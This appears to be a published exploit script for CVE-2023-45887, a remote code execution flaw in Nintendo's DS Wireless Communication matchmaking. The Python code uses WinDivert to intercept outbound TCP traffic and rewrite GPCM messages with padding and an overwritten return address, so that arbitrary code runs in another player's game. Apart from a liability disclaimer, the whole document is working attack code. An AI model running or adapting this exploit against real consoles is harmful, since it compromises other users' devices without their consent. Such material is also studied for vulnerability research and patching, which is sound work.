# Exploit Title: DS Wireless Communication Remote Code Execution# Date: 11 Oct 2023# Exploit Author: MikeIsAStar# Vendor Homepage: https://www.nintendo.com# Version: Unknown# Tested on: Wii# CVE: CVE-2023-45887"""This code will inject arbitrary code into a client's game.
You are fully responsible for all activity that occurs while using this code.
The author of this code can not be held liable to you or to anyone else as a
result of damages caused by the usage of this code.
"""import re
import sys
try:import pydivert
except ModuleNotFoundError:
sys.exit("The 'pydivert' module is not installed !")# Variables
LR_SAVE =b'\x41\x41\x41\x41'assertlen(LR_SAVE)==0x04
PADDING =b'MikeStar'assertlen(PADDING)>0x00# Constants
DWC_MATCH_COMMAND_INVALID =b'\xFE'
PADDING_LENGTH =0x23C
FINAL_KEY =b'\\final\\'
WINDIVERT_FILTER ='outbound and tcp and tcp.PayloadLength > 0'deftry_modify_payload(payload):
message_pattern =rb'\\msg\\GPCM([1-9][0-9]?)vMAT'
message = re.search(message_pattern, payload)ifnot message:returnNone
payload = payload[:message.end()]
payload += DWC_MATCH_COMMAND_INVALID
payload +=(PADDING *(PADDING_LENGTH //len(PADDING)+1))[:PADDING_LENGTH]
payload += LR_SAVE
payload += FINAL_KEY
return payload
defmain():try:with pydivert.WinDivert(WINDIVERT_FILTER)as packet_buffer:for packet in packet_buffer:
payload = try_modify_payload(packet.payload)if payload isnotNone:print('Modified a GPCM message !')
packet.payload = payload
packet_buffer.send(packet)except KeyboardInterrupt:passexcept PermissionError:
sys.exit('This program must be run with administrator privileges !')if __name__ =='__main__':
main()
